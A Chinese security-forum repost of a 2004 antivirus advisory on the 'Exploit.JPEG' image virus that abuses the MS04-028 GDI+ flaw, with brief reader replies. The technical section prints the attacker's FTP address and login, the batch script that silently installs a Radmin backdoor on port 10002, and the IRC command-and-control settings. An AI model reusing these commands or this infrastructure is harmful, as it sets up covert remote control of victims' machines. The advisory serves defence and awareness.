论坛: 菜鸟乐园 标题: 首个JPEG图片病毒来袭 发起病毒攻击第一波 复制本贴地址    
作者: 日月双星 [abctm]    版主   登录
首个JPEG图片病毒来袭 发起病毒攻击第一波

2004年09月29日 17:37 新浪科技 
  利用微软新漏洞的图片病毒“图片骇客”(Exploit.Win32.MS04-028.gen)终于现身了,用户在浏览互联网图片时就会被木马病毒感染。这种图片病毒最要命的是用户在不知不觉当中就会中木马病毒,从而被远程计算机得到控制权。金山毒霸反病毒专家认为,如果用户浏览了带毒电子图片,就有可能泄露比如:网络游戏密码、QQ账号、个人银行密码等关键信息,而且这种图片病毒有可能是美女、风景、小动物、甚至是好友的照片!让人防不甚防。

  据金山毒霸反病毒中心监测,到目前为止这种图片病毒感染的例子还不多,但是这说明利用这个漏洞来传播的图片病毒现身了,第一波图片病毒攻击已经开始。最为可怕的是,以后还会有各种攻击出现,不仅会带木马病毒,包括一些恶性蠕虫、破坏数据的病毒都会以图片病毒作为掩饰来进行破坏。

  金山反病毒中心介绍,该图片病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的。

  专家提醒:用户应立即打上各种应用程序补丁,如果怀疑机器染毒,电脑用户可查看机器10002端口有无程序访问,以防木马病毒偷盗各种密码。

  目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。并且免费提供图片病毒专杀工具(下载地址:db.kingsoft.com/special/virtusspecial/JPEG/index.shtml),欲了解更多相关信息请登陆db.kingsoft.com信息安全网站。

  技术资料分析:

  病毒名称:Exploit.JPEG

  病毒长度:4098

  威胁级别:二级

  中文名称:图片骇客

  病毒别名:

  Exploit.Win32.MS04-028.gen[AVP]

  受影响系统:未打MS04-028补丁的英文版WinXP SP1

  发现时间:9月28日

  病毒简介:

  金山反病毒中心介绍,该病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的

  技术细节:

  当用户通过资源管理器浏览该文件后,病毒会利用GDI+漏洞,尝试溢出执行下载命令。如果溢出失败,则会导致资源管理器崩溃

  如果溢出成功,则病毒尝试从以下FTP上下载远程控制文件

  ftp://2××.1××.4×.2×/www/system/

  文件包括:

  文件名 大小

  AdmDll.dll 90112

  Fport.exe 114688

  ServUStartUpLog.txt 663

  VNCHooks.dll 32768

  WinRun.dll 1407

  WinRun.exe 811008

  driver.log 1268

  drives.exe 24576

  execute.bat 150

  filter3.ocx 0

  irc-u.cfg 1052

  irc-u.dat 0

  irc-u.debug.log 16802

  irc-u.dll 102400

  kill.exe 26624

  nc.exe 59392

  nvsvc.exe 241664

  nvsvc32.dll 36864

  omnithread_rt.dll 45056

  peek.exe 34304

  raddrv.dll 29408

  radmin.reg 713

  rcrypt.exe 26112

  reg.exe 40960

  uptime.exe 6656

  vns.exe 208896

  3、运行execute.bat 文件,通过Radmin远程管理工具,建立后门,端口为10002。

  4、会建立一个IRC连接,连接到#FurQ频道。

  0.其他信息:

  FTP地址如下:

  ftp://209.171.43.27/www/system/

  用户名:bawz

  密码:pagdba

  execute.bat 内容如下

  regedit.exe /s radmin.reg

  nvsvc.exe /install /silence

  nvsvc.exe /pass:hardcore /port:10002 /save /silence

  nvsvc.exe /start /silence

  net start r_server

  IRC配置文件如下:

  server1=irc.p2pchat.net

  port1=7777

  login=Darkbro0d

  channel=#FurQ

  password=letmein

  nick1=Track100Mbit

  nick2=Trck100#1

  sfv=1

  user=Trackmaster

  login=darkbro0d

  目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆db.kingsoft.com 信息安全网站。

地主 发表时间: 04-09-30 22:36

回复: wish [wish259]   论坛用户   登录
已经阅读,同意发到论坛!

B1层 发表时间: 04-09-30 23:09

回复: 20CN柳霖明楠 [hackerjune]   论坛用户   登录

这东西厉害
知道是什么原理吗?
]我想知道啊`

B2层 发表时间: 04-10-01 09:27

回复: fancyher [fancyher]   论坛用户   登录
值得关注啊!

B3层 发表时间: 04-10-01 10:29

回复: yeah008 [yeah008]   论坛用户   登录
好惊死死哦。。。以后都不敢冲浪了。。。。。。。。。。。

B4层 发表时间: 04-10-01 11:09

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号